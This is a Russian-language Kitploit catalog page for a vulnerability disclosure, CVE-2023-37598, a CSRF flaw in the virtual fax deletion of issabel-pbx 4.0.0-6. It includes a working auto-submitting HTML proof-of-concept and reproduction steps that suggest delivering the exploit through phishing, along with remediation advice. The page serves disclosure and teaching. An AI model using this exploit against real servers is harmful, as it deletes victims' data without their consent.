Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-37598 — В issabel-pbx v4.0.0-6 существует уязвимость межсайтовой подделки запроса (CSRF) в функциональности управления виртуальным факсом. | Kitploit
Инструменты/GitHubGitHub/sahiloj/cve-2023-37598
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubsahiloj/cve-2023-37598

CVE-2023-37598

В issabel-pbx v4.0.0-6 существует уязвимость межсайтовой подделки запроса (CSRF) в функциональности управления виртуальным факсом.

Репозиторий
116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-37598 — issabel-pbx 4.0.0-6: Межсайтовая подделка запроса (CSRF)

Обзор

CVE ID: CVE-2023-37598
Тип уязвимости: Межсайтовая подделка запроса (CSRF)
Затронутый продукт: issabel-pbx v4.0.0-6
Критичность: Средняя
Обнаружил: Sahil Ojha
Дата раскрытия: 10/07/2023
Сайт поставщика: https://www.issabel.org/
Репозиторий ПО: https://github.com/IssabelFoundation/issabelPBX
Протестировано на: Windows


Описание

Уязвимость типа Cross-Site Request Forgery (CSRF) (межсайтовая подделка запроса) существует в issabel-pbx v4.0.0-6 в функциональности управления виртуальными факсами. Приложение не реализует защиту от CSRF (например, anti-CSRF токены или атрибуты cookie SameSite) для действия удаления записей виртуальных факсов.

Это позволяет удалённому неаутентифицированному атакующему создать вредоносную HTML-страницу, которая — при посещении её аутентифицированным администратором или пользователем — незаметно отправляет подделанный HTTP-запрос к приложению от имени жертвы. Подделанный запрос приводит к удалению записей виртуальных факсов без ведома или согласия жертвы, что влечёт за собой потерю данных и нарушение работы факсимильных сервисов.

Что такое CSRF?

Межсайтовая подделка запроса (CSRF) — это атака, которая заставляет браузер жертвы отправить аутентифицированный запрос к веб-приложению без намерения пользователя. Поскольку браузер автоматически включает сессионные cookie в каждый запрос, сервер не может отличить легитимный запрос от подделанного при отсутствии CSRF-токена.


Влияние

  • Потеря данных: Атакующий может удалить записи виртуальных факсов, принадлежащие любому пользователю, сделав факсимильные данные навсегда недоступными.
  • Несанкционированное изменение состояния: Административные записи факсов могут быть незаметно удалены без какого-либо взаимодействия или ведома легитимного пользователя.
  • Отсутствие необходимости аутентификации для атакующего: Атакующему не нужны действительные учётные данные — жертве (уже выполнившей вход) достаточно посетить контролируемую атакующим страницу.

Затронутый компонент

ПараметрЗначение

Доказательство концепции (PoC)

Следующий HTML-файл при открытии его аутентифицированным пользователем issabel-pbx автоматически отправит подделанный POST-запрос, который удалит виртуальный факс с id_fax=1.

Файл: CSRF exploit.html

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_fax" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Примечание: Замените {Issabel IP} на IP-адрес или имя хоста целевого сервера. Значение id_fax можно изменить, чтобы выбрать любую запись виртуального факса по её ID.


Шаги по воспроизведению

  1. Войдите в панель администратора Issabel PBX и перейдите на страницу «Виртуальный факс»:

    root@kitploit:~
    https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1
    

    Шаг 1 — страница «Виртуальный факс» Issabel

  2. Перехватите запрос на удаление с помощью прокси Burp Suite. Попробуйте удалить запись виртуального факса, перехватите запрос, щёлкните по нему правой кнопкой мыши и перейдите в Engagement Tools → Generate CSRF PoC.

    Шаг 2 — генерация CSRF PoC в Burp Suite

  3. Сохраните сгенерированный эксплойт CSRF в виде HTML-файла (см. PoC выше).

  4. Доставьте эксплойт пользователю, который уже выполнил вход в приложение Issabel (например, с помощью фишингового письма или вредоносной ссылки). Когда жертва откроет страницу и нажмёт кнопку «Submit request», запись виртуального факса будет удалена без каких-либо дальнейших действий.

    Шаг 3 — HTML-эксплойт CSRF, открытый в браузере

    Шаг 4 — виртуальный факс удалён из панели администратора


Сценарий атаки

Атакующий размещает вредоносный HTML-файл на внешнем сервере или встраивает его в письмо. Когда аутентифицированный администратор Issabel PBX открывает эту страницу в той же сессии браузера, браузер автоматически отправляет подделанный POST-запрос — вместе с действительным сессионным cookie — на сервер Issabel. Сервер обрабатывает запрос как легитимный и удаляет целевую запись виртуального факса. Жертва не получает никакого предупреждения и может не заметить удаление, пока вручную не проверит список факсов.


Устранение уязвимости

Для устранения данной уязвимости поставщику следует реализовать одну или несколько из следующих мер:

  1. Anti-CSRF токены: Включайте уникальный, непредсказуемый токен для каждой сессии во все формы, изменяющие состояние, и проверяйте его на стороне сервера перед обработкой запроса.
  2. Атрибут cookie SameSite: Устанавливайте для сессионного cookie значение SameSite=Strict или SameSite=Lax, чтобы браузер не отправлял его с межсайтовыми запросами.
  3. Пользовательские заголовки запросов: Требуйте для всех чувствительных операций пользовательский HTTP-заголовок (например, X-Requested-With: XMLHttpRequest) и проверяйте его на стороне сервера.
  4. Повторная аутентификация для деструктивных действий: Просите пользователей повторно ввести пароль или подтвердить свою личность перед выполнением необратимых операций, таких как удаление.

Ссылки

  • NVD – CVE-2023-37598
  • OWASP – Межсайтовая подделка запроса (CSRF)
  • Репозиторий Issabel PBX на GitHub
  • Официальный сайт Issabel
Скачать инструмент
Приложениеissabel-pbx
Версия4.0.0-6
Уязвимый URL/index.php?menu=faxnew&action=view&id=<ID>
Уязвимое действиеdelete (POST-параметр)
Отсутствующая защитаCSRF-токен / атрибут cookie SameSite